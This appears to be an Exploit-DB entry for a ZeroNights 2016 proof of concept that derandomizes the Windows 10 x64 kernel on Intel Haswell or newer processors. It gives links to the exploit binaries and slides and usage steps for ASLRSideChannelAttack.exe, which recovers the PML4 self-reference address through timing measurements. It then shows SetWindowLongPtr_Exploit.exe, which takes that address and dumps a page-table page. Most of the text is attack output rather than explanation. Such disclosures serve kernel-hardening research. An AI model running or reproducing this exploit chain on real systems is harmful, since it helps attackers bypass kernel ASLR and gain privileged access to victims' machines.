Complete Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip
Presentation:
https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf
I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016
Requirements
Intel Processor (Haswell or newer)
Windows 10 x64
Usage
Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:
C:\Users\qa\Desktop>ASLRSideChannelAttack.exe
+] Setting thread affinity to CPU 0
+] Getting all the potential PML4 SelfRef
+] Mapping a page oracle
+] Allocating probing target pages...
Allocation 0: 0000020E339D0000
Allocation 1: 0000020E339E0000
Allocation 2: 0000020E339F0000
Allocation 3: 0000020E33A00000
Allocation 4: 0000020E33A10000
--------------------------
+] Check that Unammped and Mapped values are consistent across several executions!
--------------------------
Unmapped Initial: 256.683746
Mapped Initial: 203.692978
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.440018
Mapped: 202.827560
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213
+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563
+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382
+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256
+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175
+] PTE FFFF810804020100 looks mapped! - Time: 204.740097
+] Removing 102 from initial array and pushing it into final array
Potential SelfRef: FFFF81C0E0703818
+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774
+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921
+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726
+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874
Time difference exceed for ffff818804020100, retrying...
+] PTE FFFF818804020100 looks mapped! - Time: 209.071213
+] Removing 103 from initial array and pushing it into final array
Time difference exceed for ffff824120904820, retrying...
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642
Time difference exceed for ffff82010719cf00, retrying...
+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593
+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344
+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862
+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263
+] PTE FFFF820804020100 looks mapped! - Time: 204.585739
+] Removing 104 from initial array and pushing it into final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003
Time difference exceed for ffff8341a0d06830, retrying...
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657
+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697
+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016
+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504
+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126
+] PTE FFFF830804020100 looks mapped! - Time: 193.314758
+] Removing 106 from initial array and pushing it into final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973
+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693
+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097
+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660
+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816
+] PTE FFFF838804020100 looks mapped! - Time: 204.008743
+] Removing 107 from initial array and pushing it into final array
Time difference exceed for ffff89c4e2713898, retrying...
Time difference exceed for ffff8bc5e2f178b8, retrying...
Time difference exceed for ffff8c46231188c0, retrying...
Unmapped Initial: 248.508636
Mapped Initial: 207.139847
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 236.360733
Mapped: 195.650040
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363
Potential SelfRef: FFFF81C0E0703818
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393
Time difference exceed for ffff81810719cf00, retrying...
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645
+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724
+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167
+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160
+] PTE FFFF818804020100 looks mapped! - Time: 195.728439
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF81C0E0703818 - Index: 103
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff818000000000
-] Erasing 103 from final array
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759
+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019
+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364
+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826
+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143
+] PTE FFFF820804020100 looks mapped! - Time: 198.158585
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff820000000000
-] Erasing 104 from final array
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823
+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525
+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040
+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254
+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034
+] PTE FFFF830804020100 looks mapped! - Time: 197.613953
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff830000000000
-] Erasing 106 from final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380
Time difference exceed for ffff83810719cf00, retrying...
Time difference exceed for ffff83810719cf00, retrying...
Unmapped Initial: 232.123840
Mapped Initial: 196.420654
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 234.845581
Mapped: 187.862518
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938
+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784
+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733
+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182
+] PTE FFFF810804020100 looks mapped! - Time: 199.812225
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff810000000000
Time difference exceed for ffff810000000000, retrying...
-] Erasing 102 from final array
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 230.247162
Mapped Initial: 198.023987
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 235.923035
Mapped: 191.605301
--------------------------
Time difference exceed for ffff83c1e0f07838, retrying...
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 258.041046
Mapped Initial: 210.309753
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 238.757538
Mapped: 203.896240
--------------------------
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102
+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836
+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333
+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445
+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763
+] PTE FFFF838804020100 looks mapped! - Time: 203.243607
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff838000000000
-] Erasing 107 from final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221
+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138
+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006
+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943
+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639
+] PTE FFFF828804020100 looks mapped! - Time: 196.754044
+] Removing 105 from initial array and pushing it into final array
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff90c864321908, retrying...
Unmapped Initial: 257.754272
Mapped Initial: 207.903702
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.145935
Mapped: 207.792923
--------------------------
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092
+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715
+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614
+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837
+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796
+] PTE FFFF828804020100 looks mapped! - Time: 208.765045
PML4e: FFFF82C160B05828 - Index: 105
KNOWN_UNMAPPED PTE: ffff828000000000
-] Erasing 105 from final array
-] Removing 100 as it seems to be unmapped
-] Removing 101 as it seems to be unmapped
-] Removing 108 as it seems to be unmapped
-] Removing 109 as it seems to be unmapped
-] Removing 10a as it seems to be unmapped
-] Removing 10b as it seems to be unmapped
-] Removing 10c as it seems to be unmapped
-] Removing 10d as it seems to be unmapped
Time difference exceed for ffff8743a1d0e870, retrying...
-] Removing 10e as it seems to be unmapped
-] Removing 10f as it seems to be unmapped
-] Removing 110 as it seems to be unmapped
Time difference exceed for ffff88c462311888, retrying...
-] Removing 111 as it seems to be unmapped
-] Removing 112 as it seems to be unmapped
-] Removing 113 as it seems to be unmapped
Time difference exceed for ffff8a45229148a0, retrying...
-] Removing 114 as it seems to be unmapped
-] Removing 115 as it seems to be unmapped
-] Removing 116 as it seems to be unmapped
-] Removing 117 as it seems to be unmapped
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffe8f47a3d1e88, retrying...
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379
+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694
+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502
+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920
+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059
+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246
+] Removing 1ec from initial array and pushing it into final array
Unmapped Initial: 233.678802
Mapped Initial: 214.496124
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 250.585373
Mapped: 213.339661
--------------------------
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174
+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457
+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861
+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334
+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160
+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926
PML4e: FFFFF67B3D9ECF60 - Index: 1ec
KNOWN_UNMAPPED PTE: fffff60000000000
Real PML4 SelfRef Found: fffff67b3d9ecf60
Left in Potential Array: ffff8c46231188c0
Left in Potential Array: ffff8cc6633198c8
Left in Potential Array: ffff8d46a351a8d0
Left in Potential Array: ffff8dc6e371b8d8
Left in Potential Array: ffff8e472391c8e0
Left in Potential Array: ffff8ec763b1d8e8
Left in Potential Array: ffff8f47a3d1e8f0
Left in Potential Array: ffff8fc7e3f1f8f8
Left in Potential Array: ffff904824120900
Left in Potential Array: ffff90c864321908
Left in Potential Array: ffff9148a4522910
Left in Potential Array: ffff91c8e4723918
Left in Potential Array: ffff924924924920
Left in Potential Array: ffff92c964b25928
Left in Potential Array: ffff9349a4d26930
Left in Potential Array: ffff93c9e4f27938
Left in Potential Array: ffff944a25128940
Left in Potential Array: ffff94ca65329948
Left in Potential Array: ffff954aa552a950
Left in Potential Array: ffff95cae572b958
Left in Potential Array: ffff964b2592c960
Left in Potential Array: ffff96cb65b2d968
Left in Potential Array: ffff974ba5d2e970
Left in Potential Array: ffff97cbe5f2f978
Left in Potential Array: ffff984c26130980
Left in Potential Array: ffff98cc66331988
Left in Potential Array: ffff994ca6532990
Left in Potential Array: ffff99cce6733998
Left in Potential Array: ffff9a4d269349a0
Left in Potential Array: ffff9acd66b359a8
Left in Potential Array: ffff9b4da6d369b0
Left in Potential Array: ffff9bcde6f379b8
Left in Potential Array: ffff9c4e271389c0
Left in Potential Array: ffff9cce673399c8
Left in Potential Array: ffff9d4ea753a9d0
Left in Potential Array: ffff9dcee773b9d8
Left in Potential Array: ffff9e4f2793c9e0
Left in Potential Array: ffff9ecf67b3d9e8
Left in Potential Array: ffff9f4fa7d3e9f0
Left in Potential Array: ffff9fcfe7f3f9f8
Left in Potential Array: ffffa05028140a00
Left in Potential Array: ffffa0d068341a08
Left in Potential Array: ffffa150a8542a10
Left in Potential Array: ffffa1d0e8743a18
Left in Potential Array: ffffa25128944a20
Left in Potential Array: ffffa2d168b45a28
Left in Potential Array: ffffa351a8d46a30
Left in Potential Array: ffffa3d1e8f47a38
Left in Potential Array: ffffa45229148a40
Left in Potential Array: ffffa4d269349a48
Left in Potential Array: ffffa552a954aa50
Left in Potential Array: ffffa5d2e974ba58
Left in Potential Array: ffffa6532994ca60
Left in Potential Array: ffffa6d369b4da68
Left in Potential Array: ffffa753a9d4ea70
Left in Potential Array: ffffa7d3e9f4fa78
Left in Potential Array: ffffa8542a150a80
Left in Potential Array: ffffa8d46a351a88
Left in Potential Array: ffffa954aa552a90
Left in Potential Array: ffffa9d4ea753a98
Left in Potential Array: ffffaa552a954aa0
Left in Potential Array: ffffaad56ab55aa8
Left in Potential Array: ffffab55aad56ab0
Left in Potential Array: ffffabd5eaf57ab8
Left in Potential Array: ffffac562b158ac0
Left in Potential Array: ffffacd66b359ac8
Left in Potential Array: ffffad56ab55aad0
Left in Potential Array: ffffadd6eb75bad8
Left in Potential Array: ffffae572b95cae0
Left in Potential Array: ffffaed76bb5dae8
Left in Potential Array: ffffaf57abd5eaf0
Left in Potential Array: ffffafd7ebf5faf8
Left in Potential Array: ffffb0582c160b00
Left in Potential Array: ffffb0d86c361b08
Left in Potential Array: ffffb158ac562b10
Left in Potential Array: ffffb1d8ec763b18
Left in Potential Array: ffffb2592c964b20
Left in Potential Array: ffffb2d96cb65b28
Left in Potential Array: ffffb359acd66b30
Left in Potential Array: ffffb3d9ecf67b38
Left in Potential Array: ffffb45a2d168b40
Left in Potential Array: ffffb4da6d369b48
Left in Potential Array: ffffb55aad56ab50
Left in Potential Array: ffffb5daed76bb58
Left in Potential Array: ffffb65b2d96cb60
Left in Potential Array: ffffb6db6db6db68
Left in Potential Array: ffffb75badd6eb70
Left in Potential Array: ffffb7dbedf6fb78
Left in Potential Array: ffffb85c2e170b80
Left in Potential Array: ffffb8dc6e371b88
Left in Potential Array: ffffb95cae572b90
Left in Potential Array: ffffb9dcee773b98
Left in Potential Array: ffffba5d2e974ba0
Left in Potential Array: ffffbadd6eb75ba8
Left in Potential Array: ffffbb5daed76bb0
Left in Potential Array: ffffbbddeef77bb8
Left in Potential Array: ffffbc5e2f178bc0
Left in Potential Array: ffffbcde6f379bc8
Left in Potential Array: ffffbd5eaf57abd0
Left in Potential Array: ffffbddeef77bbd8
Left in Potential Array: ffffbe5f2f97cbe0
Left in Potential Array: ffffbedf6fb7dbe8
Left in Potential Array: ffffbf5fafd7ebf0
Left in Potential Array: ffffbfdfeff7fbf8
Left in Potential Array: ffffc06030180c00
Left in Potential Array: ffffc0e070381c08
Left in Potential Array: ffffc160b0582c10
Left in Potential Array: ffffc1e0f0783c18
Left in Potential Array: ffffc26130984c20
Left in Potential Array: ffffc2e170b85c28
Left in Potential Array: ffffc361b0d86c30
Left in Potential Array: ffffc3e1f0f87c38
Left in Potential Array: ffffc46231188c40
Left in Potential Array: ffffc4e271389c48
Left in Potential Array: ffffc562b158ac50
Left in Potential Array: ffffc5e2f178bc58
Left in Potential Array: ffffc6633198cc60
Left in Potential Array: ffffc6e371b8dc68
Left in Potential Array: ffffc763b1d8ec70
Left in Potential Array: ffffc7e3f1f8fc78
Left in Potential Array: ffffc86432190c80
Left in Potential Array: ffffc8e472391c88
Left in Potential Array: ffffc964b2592c90
Left in Potential Array: ffffc9e4f2793c98
Left in Potential Array: ffffca6532994ca0
Left in Potential Array: ffffcae572b95ca8
Left in Potential Array: ffffcb65b2d96cb0
Left in Potential Array: ffffcbe5f2f97cb8
Left in Potential Array: ffffcc6633198cc0
Left in Potential Array: ffffcce673399cc8
Left in Potential Array: ffffcd66b359acd0
Left in Potential Array: ffffcde6f379bcd8
Left in Potential Array: ffffce673399cce0
Left in Potential Array: ffffcee773b9dce8
Left in Potential Array: ffffcf67b3d9ecf0
Left in Potential Array: ffffcfe7f3f9fcf8
Left in Potential Array: ffffd068341a0d00
Left in Potential Array: ffffd0e8743a1d08
Left in Potential Array: ffffd168b45a2d10
Left in Potential Array: ffffd1e8f47a3d18
Left in Potential Array: ffffd269349a4d20
Left in Potential Array: ffffd2e974ba5d28
Left in Potential Array: ffffd369b4da6d30
Left in Potential Array: ffffd3e9f4fa7d38
Left in Potential Array: ffffd46a351a8d40
Left in Potential Array: ffffd4ea753a9d48
Left in Potential Array: ffffd56ab55aad50
Left in Potential Array: ffffd5eaf57abd58
Left in Potential Array: ffffd66b359acd60
Left in Potential Array: ffffd6eb75badd68
Left in Potential Array: ffffd76bb5daed70
Left in Potential Array: ffffd7ebf5fafd78
Left in Potential Array: ffffd86c361b0d80
Left in Potential Array: ffffd8ec763b1d88
Left in Potential Array: ffffd96cb65b2d90
Left in Potential Array: ffffd9ecf67b3d98
Left in Potential Array: ffffda6d369b4da0
Left in Potential Array: ffffdaed76bb5da8
Left in Potential Array: ffffdb6db6db6db0
Left in Potential Array: ffffdbedf6fb7db8
Left in Potential Array: ffffdc6e371b8dc0
Left in Potential Array: ffffdcee773b9dc8
Left in Potential Array: ffffdd6eb75badd0
Left in Potential Array: ffffddeef77bbdd8
Left in Potential Array: ffffde6f379bcde0
Left in Potential Array: ffffdeef77bbdde8
Left in Potential Array: ffffdf6fb7dbedf0
Left in Potential Array: ffffdfeff7fbfdf8
Left in Potential Array: ffffe070381c0e00
Left in Potential Array: ffffe0f0783c1e08
Left in Potential Array: ffffe170b85c2e10
Left in Potential Array: ffffe1f0f87c3e18
Left in Potential Array: ffffe271389c4e20
Left in Potential Array: ffffe2f178bc5e28
Left in Potential Array: ffffe371b8dc6e30
Left in Potential Array: ffffe3f1f8fc7e38
Left in Potential Array: ffffe472391c8e40
Left in Potential Array: ffffe4f2793c9e48
Left in Potential Array: ffffe572b95cae50
Left in Potential Array: ffffe5f2f97cbe58
Left in Potential Array: ffffe673399cce60
Left in Potential Array: ffffe6f379bcde68
Left in Potential Array: ffffe773b9dcee70
Left in Potential Array: ffffe7f3f9fcfe78
Left in Potential Array: ffffe8743a1d0e80
Left in Potential Array: ffffe8f47a3d1e88
Left in Potential Array: ffffe974ba5d2e90
Left in Potential Array: ffffe9f4fa7d3e98
Left in Potential Array: ffffea753a9d4ea0
Left in Potential Array: ffffeaf57abd5ea8
Left in Potential Array: ffffeb75badd6eb0
Left in Potential Array: ffffebf5fafd7eb8
Left in Potential Array: ffffec763b1d8ec0
Left in Potential Array: ffffecf67b3d9ec8
Left in Potential Array: ffffed76bb5daed0
Left in Potential Array: ffffedf6fb7dbed8
Left in Potential Array: ffffee773b9dcee0
Left in Potential Array: ffffeef77bbddee8
Left in Potential Array: ffffef77bbddeef0
Left in Potential Array: ffffeff7fbfdfef8
Left in Potential Array: fffff0783c1e0f00
Left in Potential Array: fffff0f87c3e1f08
Left in Potential Array: fffff178bc5e2f10
Left in Potential Array: fffff1f8fc7e3f18
Left in Potential Array: fffff2793c9e4f20
Left in Potential Array: fffff2f97cbe5f28
Left in Potential Array: fffff379bcde6f30
Left in Potential Array: fffff3f9fcfe7f38
Left in Potential Array: fffff47a3d1e8f40
Left in Potential Array: fffff4fa7d3e9f48
Left in Potential Array: fffff57abd5eaf50
Left in Potential Array: fffff5fafd7ebf58
Left in Potential Array: fffff6fb7dbedf68
Left in Potential Array: fffff77bbddeef70
Left in Potential Array: fffff7fbfdfeff78
Left in Potential Array: fffff87c3e1f0f80
Left in Potential Array: fffff8fc7e3f1f88
Left in Potential Array: fffff97cbe5f2f90
Left in Potential Array: fffff9fcfe7f3f98
Left in Potential Array: fffffa7d3e9f4fa0
Left in Potential Array: fffffafd7ebf5fa8
Left in Potential Array: fffffb7dbedf6fb0
Left in Potential Array: fffffbfdfeff7fb8
Left in Potential Array: fffffc7e3f1f8fc0
Left in Potential Array: fffffcfe7f3f9fc8
Left in Potential Array: fffffd7ebf5fafd0
Left in Potential Array: fffffdfeff7fbfd8
Left in Potential Array: fffffe7f3f9fcfe0
Left in Potential Array: fffffeff7fbfdfe8
Left in Potential Array: ffffff7fbfdfeff0
Left in Potential Array: fffffffffffffff8
Left in Final Array: fffff67b3d9ecf60
Result: fffff67b3d9ecf60
Run SetWindowLongPtr_Exploit.exe
C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
My PID is: 6056
Current Username: qa
PML4 Self Ref: FFFFF67B3D9ECF60
Enter to continue...
Value Self Ref = 8000000100211867
000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....
000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............
000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
